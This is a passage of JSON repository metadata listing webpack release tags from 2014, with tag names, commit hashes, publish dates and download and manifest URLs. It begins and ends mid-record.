/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2